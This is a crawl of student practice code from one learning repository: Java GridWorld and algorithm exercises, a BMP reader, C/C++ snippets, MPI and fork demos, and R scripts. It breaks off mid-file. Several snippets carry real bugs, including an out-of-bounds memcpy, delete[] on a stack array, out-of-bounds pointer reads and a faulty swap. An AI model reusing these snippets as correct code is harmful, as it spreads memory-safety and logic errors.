"9a97070a3ffcfa1423aa15a8c0787dd3c2a5c18e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1529, "license_type": "permissive", "max_line_length": 79, "num_lines": 74, "path": "/java/projects/gridworld/Part2/DancingBug/src/DancingBug.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import info.gridworld.actor.Bug;\n\n/**\n * A <code>DancingBug</code> traces out a square \"box\" of a given size. <br />\n * The implementation of this class is testable on the AP CS A and AB exams.\n */\npublic class DancingBug extends Bug\n{\n private int steps;\n private int[] sideTurnTimesArray;\n private boolean needTurn;\n private int trunTimes;\n\n /**\n * Constructs a box bug that traces a square of a given side turnTimesArray\n * @param turnTimesArray the side turnTimesArray\n */\n public DancingBug(int []turnTimesArray)\n {\n steps = 0;\n needTurn = true;\n trunTimes = 0;\n\n if (turnTimesArray == null) \n {\n sideTurnTimesArray = new int[0];\n } else \n {\n sideTurnTimesArray = turnTimesArray.clone();\n }\n\n }\n\n /**\n * do the next action \n */\n public void act()\n {\n if (needTurn)\n {\n turnToDirectiom();\n } else {\n runLine();\n }\n }\n\n /**\n * turn Direction and check if is finished \n */\n public void turnToDirectiom()\n {\n if ( trunTimes == sideTurnTimesArray[steps%sideTurnTimesArray.length] )\n {\n needTurn = false;\n trunTimes = 0;\n } else {\n turn();\n trunTimes++;\n }\n }\n\n /**\n * move at one line\n */\n public void runLine()\n {\n if (canMove())\n {\n move();\n steps++;\n needTurn = true;\n }\n }\n}\n" }, { "alpha_fraction": 0.5798354148864746, "alphanum_fraction": 0.6074073910713196, "avg_line_length": 20.900901794433594, "blob_id": "8b7c9512d4198b4f220733a525185dac135e2fbc", "content_id": "c6ac40aa5995e5103181c6b37815e52e78d2c1b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2430, "license_type": "permissive", "max_line_length": 88, "num_lines": 111, "path": "/java/projects/gridworld/Ex1_Sub/NewImageIO.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// this is ImageIO file that implements IImageIO\n// just use binary file read method wrote by ourselves\n// sava to file is said to be use Java's API (smile face)\n\n\n// this time in fact we just use IImageIO\nimport imagereader.*;\n// \nimport java.awt.image.*;\n// for Image\nimport java.awt.*;\nimport java.io.*;\nimport javax.imageio.*;\n\npublic class NewImageIO implements IImageIO \n{\n\t// head and info total size\n\tpublic static final int READ_SIZE = 54;\n\n\t// implements READ\n\tpublic Image myRead(String filePath)\n\t{\n\t\tImage image;\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tFileInputStream in = new FileInputStream(filePath);\n\n\t\t\tbyte bytes[] = new byte[READ_SIZE];\n\t\t\t\n\t\t\tin.read(bytes, 0, READ_SIZE);\n\n\t\t\tint width = myByte2Int(bytes, 18, 22);\n\t\t\tint height = myByte2Int(bytes, 22, 26);\n\t\t\tint size = myByte2Int(bytes, 34, 38);\n\n\t\t\tint spaceSize = (size / height) - width * 3;\n\t\t\tspaceSize = spaceSize == 4 ? 0 : spaceSize;\n\n\t\t\tint data[] = new int[width * height];\n\t\t\tbyte buffer[] = new byte[size];\n\t\t\tin.read(buffer, 0, size);\n\n\t\t\tint index = 0;\n\t\t\tfor (int i = 0; i < height; i++)\n\t\t\t{\n\t\t\t\tfor (int j = 0; j < width; j++)\n\t\t\t\t{\n\t\t\t\t\tdata[width * (height - i - 1) + j] = \n\t\t\t\t\t(255 & 0xff) << 24\n\t\t\t\t\t| (((int)buffer[index + 2] & 0xff) << 16)\n\t\t\t\t\t| (((int)buffer[index + 1] & 0xff) << 8)\n\t\t\t\t\t| (((int)buffer[index + 0] & 0xff) << 0);\n\n\t\t\t\t\tindex += 3;\n\t\t\t\t}\n\t\t\t\tindex += spaceSize;\n\t\t\t}\n\n\n\t\t\timage = Toolkit.getDefaultToolkit().createImage(\n\t\t\t\tnew MemoryImageSource(\n\t\t\t\t\twidth, height, data, 0, width));\n\n\t\t\tin.close();\n\t\t\treturn image;\n\t\t}\n\t\tcatch (Exception e)\n\t\t{\n\t\t\tSystem.out.println(\"error\");\n\t\t}\n\t\treturn (Image)null;\n\n\t}\n\n\t// implements WRITE\n\tpublic Image myWrite(Image image, String filePath)\n\t{\n\t\ttry\n\t\t{\n\t\t\tFile imageFile = new File(filePath + \".bmp\");\n\t\t\tBufferedImage buffer = new BufferedImage(image.getWidth(null), image.getHeight(null),\n\t\t\t\tBufferedImage.TYPE_INT_RGB);\n\t\t\tGraphics2D g2 = buffer.createGraphics();\n\t\t\tg2.drawImage(image, 0, 0, null);\n\t\t\tg2.dispose();\n\t\t\t\n\t\t\tImageIO.write(buffer, \"bmp\", imageFile);\n\t\t}\n\t\tcatch(Exception e)\n\t\t{\n\t\t\tSystem.out.println(\"error\");\n\t\t}\n\t\treturn image;\n\t}\n\n\n\t// we need a method that eaily trans bytes to int \n\tpublic int myByte2Int(byte bytes[], int begin, int end) \n\t{\n\t\t// we store LSB in higher index\n\t\tint ans = 0;\n\t\t// E.G byte[] = {1, 2, 3, 4} ans = 0x04030201\n\t\tfor (int i = begin; i < end; i++)\n\t\t{\n\t\t\tans += (int)(bytes[i] & 0xff) << (8 * (i - begin));\n\t\t}\n\n\t\treturn ans;\n\t}\n}" }, { "alpha_fraction": 0.5921696424484253, "alphanum_fraction": 0.6052201986312866, "avg_line_length": 20.89285659790039, "blob_id": "19bae5c43cc25f34d99f2bf9f92e5204fc841dfa", "content_id": "cf59a5553a062b21035f7392de24ab456d591876", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 677, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/R/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# R-Study\n`jskyzero` `2017/09/03`\n\n## Overview\n+ R is a free software environment for statistical computing and graphics.\n+ ...\n\n## Install & Run\n+ download R from R language official site.\n+ run in each indivial folder.\n\n## Strtucture\n```\n.\n├── docs\n├── harwork\n│   ├── hardway // hardway\n│   ├── helloworld // helloworld\n│   └── packages // package usage\n├── projects\n│   └── Github_Analyzer // todo\n└── README.md\n```\n## reference\n\n+ [R-Project](https://www.r-project.org/)\n+ [The R Manuals](https://cran.r-project.org/manuals.html)\n+ [Learn R, in R](http://swirlstats.com/)\n" }, { "alpha_fraction": 0.7523302435874939, "alphanum_fraction": 0.7656458020210266, "avg_line_length": 38.52631759643555, "blob_id": "20b2980556c5e81a0ca4203e6a57544bd5ab49c7", "content_id": "74467407f20677fef027417d85d55ad6600ff9a5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 751, "license_type": "permissive", "max_line_length": 198, "num_lines": 19, "path": "/java/hardwork/swing/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Swing\n`jskyzero` `2017/12/31`\n\n## Overview\n\n+ Java Swing is a part of Java Foundation Classes (JFC) that is used to create window-based applications. It is built on the top of AWT (Abstract Windowing Toolkit) API and entirely written in java.\n\n+ JFC:The Java Foundation Classes (JFC) are a set of GUI components which simplify the development of desktop applications.\n\n![hierarchy of java swing API](http://www.javatpoint.com/images/swinghierarchy.jpg)\n\nhow to create a frame:\n1. By creating the object of Frame class (association) \n2. By extending Frame class (inheritance)\n\n## Reference\n\n+ [Getting Started with Swing](https://docs.oracle.com/javase/tutorial/uiswing/start/index.html)\n+ [Java Swing Tutorial](http://www.javatpoint.com/java-swing)\n" }, { "alpha_fraction": 0.6186046600341797, "alphanum_fraction": 0.6232557892799377, "avg_line_length": 15.576923370361328, "blob_id": "581e2d0bad4d543247249e1e2350e4e23d028644", "content_id": "e94fb6b400b7ec30ec9f0db672c77a43f53c0f63", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 430, "license_type": "permissive", "max_line_length": 45, "num_lines": 26, "path": "/c/projects/MPI/hardway/MPI_comm_free.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n#include<mpi.h>\n\nint main(int argc, char **argv)\n{\n\tint myid, numprocs;\n\tMPI_Comm new_comm;\n\t\n\tMPI_Init(&argc, &argv);\n\t\n\tMPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\t\n\tMPI_Comm_dup(MPI_COMM_WORLD, &new_comm);\n\t\n\t// free\n\tMPI_Comm_free(&new_comm);\n\t\n\tif(myid == 0) {\n\t\tif (new_comm == MPI_COMM_NULL)\n\t\t\tprintf(\"Now the comm is freed.\\n\");\n\t}\n\n\tMPI_Finalize();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5080214142799377, "alphanum_fraction": 0.51871657371521, "avg_line_length": 12.357142448425293, "blob_id": "159b6762ea44803468aeedd4262bb54428a9a4d9", "content_id": "3331a451fbcaa91a0a8edfba5de965bd636c7ad2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 187, "license_type": "permissive", "max_line_length": 27, "num_lines": 14, "path": "/c/hardwork/hardway/student_struct2.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include<stdio.h>\nint main() {\n\tstruct student{\n\t\tchar * name;\n\t\tchar * marks;\n\t};\n\t struct student sa = {\n\t \t\"abc\",\n\t \t\"87\"\n\t };\n\t printf(\"%s\",sa.marks);\n\t printf(\"%s\",(&sa)->name);\n\t\n}\n" }, { "alpha_fraction": 0.47727271914482117, "alphanum_fraction": 0.5045454502105713, "avg_line_length": 19.047618865966797, "blob_id": "71c7560fe8dc13bdf0677769ce3cc3834c41530c", "content_id": "2262832fed39f45c5891031e9be5e3267997840f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 440, "license_type": "permissive", "max_line_length": 50, "num_lines": 21, "path": "/c/hardwork/library/string/memcpy.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <string.h>\r\n\r\nint main() {\r\n int array[] = {1, 2, 3};\r\n int target[3];\r\n\r\n memset(target, 0, sizeof(int) * 3);\r\n puts(\"initial array\");\r\n for (int i = 0; i < 3; i++) {\r\n printf(\"index: %d value: %d\\n\", i, target[i]);\r\n }\r\n\r\n\r\n memcpy(target, array, sizeof(int) * 3);\r\n puts(\"after copy array\");\r\n for (int i = 0; i < 3; i++) {\r\n printf(\"index: %d value: %d\\n\", i, target[i]);\r\n }\r\n return 0;\r\n}" }, { "alpha_fraction": 0.35568514466285706, "alphanum_fraction": 0.4169096350669861, "avg_line_length": 20.4375, "blob_id": "71327494459a46e30d65920cc9c6ad4e3fcc4a02", "content_id": "15288446791880f095ee89b5ead695a50ea7511b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 343, "license_type": "permissive", "max_line_length": 36, "num_lines": 16, "path": "/c/hardwork/hardway/about_ponirt.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n int a[5] = {10, 20, 30, 40, 50};\n int* p = a;\n printf(\"%p\\n\", a);\n printf(\"%p\\n\", p);\n printf(\"%p\\n\", &p);\n printf(\"%p\\n\", &a[0]);\n printf(\"%p\\n\", &a[1]);\n printf(\"%d\\n\", a[4] - a[3]);\n printf(\"%d\\n\", a[2]);\n printf(\"%d\\n\", a[-1]);\n printf(\"%d\\n\", *(p + 7));\n if ((a[1] = 2) != 2) printf(\"NO\");\n}\n" }, { "alpha_fraction": 0.5880281925201416, "alphanum_fraction": 0.6795774698257446, "avg_line_length": 21.83333396911621, "blob_id": "ccabff2b4584cf476929ee44fe202a6c8045ce8c", "content_id": "8724cc3708764d0898e444a3156660d01318a6ec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 304, "license_type": "permissive", "max_line_length": 72, "num_lines": 12, "path": "/R/projects/Words_Analyzer/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Words_Analyzer\r\n`jskyzero` `2018/04/22`\r\n\r\n## Overview\r\n\r\n+ use `R` language to construct a wordcloud\r\n+ powered by `jiebaR`, `sqldf`, `wordcloud2`\r\n\r\n\r\n## Reference: \r\n+ [如何生成关键词云图?](https://www.zhihu.com/question/24658552/answer/153704543)\r\n+ [wordart](https://wordart.com/create)" }, { "alpha_fraction": 0.42093023657798767, "alphanum_fraction": 0.43953487277030945, "avg_line_length": 21.6842098236084, "blob_id": "9a0a4eb35f7711e607ec96fa9537e92799279130", "content_id": "4053735c985347adda9c64187506db34f93404be", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 430, "license_type": "permissive", "max_line_length": 55, "num_lines": 19, "path": "/java/projects/algorithms/chapter1/part1/Q26.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q26\n */\npublic class Q26 {\n public static void main(String[] args) {\n int a = 0, b = 1, c = 2, t = 0;\n\n if (a > b) {t = a; a = b; b = t;}\n if (a > c) {t = a; a = c; c = t;}\n if (b > c) {t = b; b = c; c = a;}\n\n // why can sort ?\n // a b c\n // a > b and a > c makes a is smallest\n // b > c makes b is smaller than c\n // so a <= b <= c\n // this is like basic sort let smaller one be left.\n }\n}" }, { "alpha_fraction": 0.6508688926696777, "alphanum_fraction": 0.6777251362800598, "avg_line_length": 23.346153259277344, "blob_id": "fae5955d837e6d83c0ef32e2cdb98c8465b58529", "content_id": "383673bfd1408b822a44cbbb49891908a29c9f10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 699, "license_type": "permissive", "max_line_length": 91, "num_lines": 26, "path": "/java/projects/algorithms/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Algorithm\n`jskyzero` `2018/02/15`\n\n## Overview\n+ these codes is about ***Algorithms 4th*** questions and answers.\n+ ~~I don't have internet connection now, so~~ I simplely use universal java api.\n+ Try to read the book and see the questions before each part, give your own answer.\n\n## Install & Run\n+ Install Java: you should hava install some version for instance 1.8 JDK in your computer.\n+ Run Code: use javac to compile the code and use java to run the class.\n\n## Structure\n\n```\n.\n├── chapter1 // 基础\n├── chapter2 // 排序\n├── chapter3 // 查找\n├── chapter4 // 图\n├── chapter5 // 字符串\n├── chapter6 // 背景\n└── README.md\n```\n\n## Reference\n" }, { "alpha_fraction": 0.4819819927215576, "alphanum_fraction": 0.5, "avg_line_length": 21.200000762939453, "blob_id": "f1fe69cb3bdf73c13a02940264308567a76e0084", "content_id": "83e47c159af99e8df004a9f2bb6a584115acfaed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 222, "license_type": "permissive", "max_line_length": 43, "num_lines": 10, "path": "/c/hardwork/hardway/undef.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint foo(int, int);\n#define foo(x, y) x / y + x\nint main() {\n int i = -6, j = 3;\n printf(\"%d \", foo(i + j, 3));\n#undef foo\n printf(\"%d\\n\", foo(i + j, 3));\n}\nint foo(int x, int y) { return x / y + x; }\n" }, { "alpha_fraction": 0.6699187159538269, "alphanum_fraction": 0.6715447306632996, "avg_line_length": 23.639999389648438, "blob_id": "7b9c9d470e9b7d836effe27bfec113e9ffc8443d", "content_id": "828d7e9b7816b6179192c11f090d2f054240a43d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 671, "license_type": "permissive", "max_line_length": 56, "num_lines": 25, "path": "/c/projects/MPI/hardway/MPI_group_rank.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world;\n int rank_of_group;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n // int MPI_Comm_group(MPI_Comm comm, MPI_Group *group)\n // MPI_Comm_group用来建立一个通信组对应的新进程组\n // int MPI_Group_rank(MPI_Group group, int *rank)\n // MPI_Group_rank查询调用进程在进程组里的rank\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n MPI_Group_rank(group_world, &rank_of_group);\n\n printf(\"myid: %d rank: %d\\n\", myid, rank_of_group);\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.623115599155426, "alphanum_fraction": 0.643216073513031, "avg_line_length": 23.875, "blob_id": "08fbc4fddcd0af6d30bde7e705bda663b902b048", "content_id": "7d9952e733cad821f3851fac83d60b9c1d670b19", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 398, "license_type": "permissive", "max_line_length": 62, "num_lines": 16, "path": "/R/harwork/hardway/variable.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# variables in R\n\n# Valid names should consist of letters, numbers, and '_' '.' \n# starts with a letter, or the dot not followed by a number.\n\ntoday.weather <- \"sun\"\n\"2017/09/03\" -> today.date\n\ncat (\"about today\\n\",\n \"\\bdate is \", today.date, \"\\n\",\n \"\\bweather is \", today.weather, \"\\n\")\n\n# find / letele variables\nprint(ls(all.names = TRUE))\nrm(today.weather)\nprint(ls(all.names = TRUE))\n" }, { "alpha_fraction": 0.5486284494400024, "alphanum_fraction": 0.576059877872467, "avg_line_length": 21.27777862548828, "blob_id": "b0b020eca38bfc451540a595b1ac4b4acc324c5d", "content_id": "278736623662db80bbd30bb371bcb992f5c2c4aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 401, "license_type": "permissive", "max_line_length": 64, "num_lines": 18, "path": "/c/hardwork/hardway/double_size.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <string.h>\n#include <stdio.h>\n\nint *doubleCapacity(int *list, int size) {\n size *= 2;\n // int *items;\n int *newItems = new int[size];\n memcpy(newItems, list, sizeof(int) * size);\n delete[] list;\n list = newItems;\n return list;\n}\n\nint main() {\n int list[5] = {1, 2, 3, 4, 5};\n int *newlist = doubleCapacity(list, 5);\n for (int i = 0; i < 2 * 5; i++) printf(\"%d \", *(newlist + i));\n}\n" }, { "alpha_fraction": 0.7079365253448486, "alphanum_fraction": 0.720634937286377, "avg_line_length": 21.5, "blob_id": "17b0f40822247850ed1f8d9508b730fd07cec34c", "content_id": "0b619d508491b1a2579c25325ad5e23211e8bc7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 315, "license_type": "permissive", "max_line_length": 80, "num_lines": 14, "path": "/java/projects/gridworld/Part5/UnboundedGrid/test/UnboundedTest.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import static org.junit.Assert.*;\nimport org.junit.Test;\n\npublic class UnboundedTest\n{\n\t\n\t@Test \n\tpublic void testHello()\n\t{\n\t\tassertEquals(\"Hello World!\", \"Hello World!\");\n\t}\n}\n// javac -classpath .:junit-4.9.jar HelloWorldTest.java\n// java -classpath .:junit-4.9.jar -ea org.junit.runner.JUnitCore HelloWorldTest\n" }, { "alpha_fraction": 0.5519348382949829, "alphanum_fraction": 0.5621181130409241, "avg_line_length": 21.363636016845703, "blob_id": "51cbfeec4856ed7d050d4b79dd43e5232d841955", "content_id": "2b723337b2ba42b3f768373f575fb35a7dec4ddb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 491, "license_type": "permissive", "max_line_length": 81, "num_lines": 22, "path": "/java/projects/algorithms/chapter1/part1/Q5.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.Scanner;\n\nclass Q5 {\n public static void main(String[] args) {\n \n Scanner in = new Scanner(System.in);\n System.out.println(\"input two double\");\n\n while (true) {\n if (!in.hasNextDouble()) break;\n double x = in.nextDouble();\n\n if (!in.hasNextDouble()) break;\n double y = in.nextDouble();\n\n System.out.println((x > 0 && x < 1) && (y > 0 && y < 1) ? \"true\": \"false\");\n System.out.println(\"input two double\");\n }\n\n in.close();\n }\n}" }, { "alpha_fraction": 0.6896551847457886, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 13.75, "blob_id": "6dd7662f74014b090cb2eed42e6c2a746e1164ad", "content_id": "dd102db9e66ed6320a5f76a47a4564e8dd9c8392", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 58, "license_type": "permissive", "max_line_length": 25, "num_lines": 4, "path": "/R/harwork/helloworld/helloworld.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# run like\n# Rscript helloworld.R\n\nprint(\"Hello World\")" }, { "alpha_fraction": 0.3880764842033386, "alphanum_fraction": 0.43532058596611023, "avg_line_length": 15.462963104248047, "blob_id": "32a16aedac238da2c85b702e8df99577b377f962", "content_id": "c2ee30c92188eae22da472aadd1f1c91768869c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 889, "license_type": "permissive", "max_line_length": 48, "num_lines": 54, "path": "/c/hardwork/hardway/sort_string.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdio>\n#include <cstring>\n\nint a[128];\nchar* sortString(const char* const s) {\n int n = strlen(s);\n static char str[10005];\n\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n\n for (int i = 0; i < n; i++) {\n a[*(s + i)]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n str[j] = i;\n a[i]--;\n j++;\n }\n }\n return str;\n}\nvoid sortString(const char* const s, char* s1) {\n int n = strlen(s);\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n for (int i = 0; i < n; i++) {\n a[*(s + i)]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n s1[j] = i;\n a[i]--;\n j++;\n }\n }\n return;\n}\n\nint main() {\n char* str = \"bca\";\n char* s1 = sortString(str);\n std::cout << s1 << std::endl;\n\n char s2[100];\n sortString(str, s2);\n std::cout << s2 << std::endl;\n}\n" }, { "alpha_fraction": 0.5111989378929138, "alphanum_fraction": 0.5862977504730225, "avg_line_length": 17.975000381469727, "blob_id": "738ef22dba15039ed8011d26b838083beab6adee", "content_id": "513464e9d2148e7840e41d7d61371131ef53750b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 759, "license_type": "permissive", "max_line_length": 44, "num_lines": 40, "path": "/c/hardwork/hardway/char_and_string_type.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n#include <assert.h> // for assert()\n\ntypedef char char_type1;\ntypedef char *char_type2;\ntypedef char(char_type3);\ntypedef char(*char_type4);\ntypedef char *(char_type5);\n\ntypedef char(str_type1)[2];\ntypedef char (*str_type2)[2];\n\nint main() {\n char_type1 ch1 = 'A';\n char_type2 ch2 = &ch1;\n assert(*ch2 = ch1);\n\n char_type3 ch3 = ch1;\n assert(ch3 = ch1);\n\n char_type4 ch4 = ch2;\n assert(*ch4 = ch3);\n\n char_type5 ch5 = ch4;\n assert(*ch5 == ch1);\n\n str_type1 str1 = \"A\";\n assert(str1[0] == 'A');\n assert(str1[1] == '\\0');\n\n char_type2 str0 = str1;\n assert(str0[0] == 'A');\n assert(str0[1] == '\\0');\n\n str_type2 str2 = &str1;\n assert(str2[0][0] == 'A');\n assert(str2[0][1] == '\\0');\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6280487775802612, "alphanum_fraction": 0.6829268336296082, "avg_line_length": 32, "blob_id": "6e416a46021475a49448a406ce67aed13cb244d8", "content_id": "d10d8387842939e798f830702e73856ae4a73758", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "permissive", "max_line_length": 85, "num_lines": 5, "path": "/cplusplus/projects/Cocos2dx/docs/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "## More Reference\n\n+ [Cocos2d-x 用户手册](http://www.cocos.com/docs/native/)\n+ [Cocos2d-x v3.10 Reference](http://www.cocos2d-x.org/docs/api-ref/cplusplus/V3.10/)\n+ ..." }, { "alpha_fraction": 0.6959287524223328, "alphanum_fraction": 0.7048345804214478, "avg_line_length": 22.787878036499023, "blob_id": "cbcc06c8bcdb3bdfd89bc4a13a85c46f1f56e39e", "content_id": "ac08631cef4d3974a8cd957cc4c4fcbb6f7a19e9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 786, "license_type": "permissive", "max_line_length": 112, "num_lines": 33, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/GameScene.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"cocos2d.h\"\n#include \"ui/CocosGUI.h\"\n#include <string>\n#include \"Global.h\"\nusing namespace cocos2d::ui;\n\n#include \"network/HttpClient.h\"\nusing namespace cocos2d::network;\n\nusing std::string;\n\nclass GameScene : public cocos2d::Layer\n{\npublic:\n // there's no 'id' in cpp, so we recommend returning the class instance pointer\n static cocos2d::Scene* createScene();\n\n // Here's a difference. Method 'init' in cocos2d-x returns bool, instead of returning 'id' in cocos2d-iphone\n virtual bool init();\n\n // implement the \"static create()\" method manually\n CREATE_FUNC(GameScene);\n\nprivate:\n float visibleHeight;\n float visibleWidth;\n TextField * score_field;\n TextField * rank_field;\n Button *submit_button;\n Button *rank_button;\n};\n\n" }, { "alpha_fraction": 0.45108696818351746, "alphanum_fraction": 0.4728260934352875, "avg_line_length": 14.333333015441895, "blob_id": "11bad2c626b2f1bc8edc7ea5763fcd1a56d12b56", "content_id": "d95111f1e9d88c1bb33f6ad80862118169dd8006", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 184, "license_type": "permissive", "max_line_length": 24, "num_lines": 12, "path": "/c/hardwork/hardway/num_float.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint main() {\n unsigned int i = 23;\n signed char c = -23;\n if (i > c)\n printf(\"Yes\\n\");\n else if (i < c) {\n printf(\"%d\", c - i);\n printf(\"No\\n\");\n }\n}\n" }, { "alpha_fraction": 0.6228747963905334, "alphanum_fraction": 0.6522411108016968, "avg_line_length": 27.15217399597168, "blob_id": "37e067740b433c3c051cb588efb772a7c58a475d", "content_id": "00b51ae20f4f8cf4a19219159fc042cf09b78906", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1294, "license_type": "permissive", "max_line_length": 91, "num_lines": 46, "path": "/java/projects/algorithms/chapter1/part1/Q6.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.io.ByteArrayOutputStream;\nimport java.io.PrintStream;\nimport java.util.function.Supplier;\n\nclass Q6 {\n public static void changeDefultOutStream(ByteArrayOutputStream baos, PrintStream oldPS) {\n // Create a stream to hold the output\n PrintStream newPS = new PrintStream(baos);\n // Tell Java to use your special stream\n System.setOut(newPS);\n }\n\n public static void assertResultEqual(ByteArrayOutputStream baos, String result) {\n assert (baos.toString().equals(result));\n }\n\n public static void changeBackDefaultOutStream(PrintStream oldPS) {\n System.out.flush();\n System.setOut(oldPS);\n }\n\n public static void testCodes(Supplier<Integer> func, String result) {\n // IMPORTANT: Save the old System.out!\n PrintStream oldPS = System.out;\n ByteArrayOutputStream baos = new ByteArrayOutputStream();\n changeDefultOutStream(baos, oldPS);\n func.get();\n changeBackDefaultOutStream(oldPS);\n assertResultEqual(baos, result);\n }\n\n public static void main(String[] argv) {\n testCodes(() -> {\n int f = 0;\n int g = 1;\n for (int i = 0; i <= 8; i++) {\n System.out.print(f);\n f = f + g;\n g = f - g;\n }\n return 0;\n }, \"01123581321\");\n // f: 0 1 1 2 3 5 8 13 21 \n // g: 1 0 1 1 2 3 5 8 13\n }\n}" }, { "alpha_fraction": 0.41312742233276367, "alphanum_fraction": 0.4517374634742737, "avg_line_length": 13.44444465637207, "blob_id": "9cb236f8fce0ab551122e3567c3cd73a50b1bf90", "content_id": "090f81fae36ecf690ea43b4956a03891d5b8928b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 259, "license_type": "permissive", "max_line_length": 23, "num_lines": 18, "path": "/c/projects/POSIX/Lab1/1.0.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n printf(\"**1**\\n\");\n\n int pid_2 = fork();\n printf(\"**2**\\n\");\n\n if (pid_1 == 0) {\n int pid_3 = fork();\n printf(\"**3**\\n\");\n } else {\n printf(\"**4**\\n\");\n }\n return 0;\n}" }, { "alpha_fraction": 0.4978693127632141, "alphanum_fraction": 0.5213068127632141, "avg_line_length": 25.074073791503906, "blob_id": "5df1c386c730d35797ccb94899220213448ada5f", "content_id": "9f68d9209917db0eb45a7a99a2489599034b18d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1408, "license_type": "permissive", "max_line_length": 77, "num_lines": 54, "path": "/c/hardwork/library/stdio/printf.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n\nvoid usage() {\n puts(\"\\nfunction printf\");\n puts(\"int printf (const char * format, ... );\");\n puts(\"Write the C string pointed 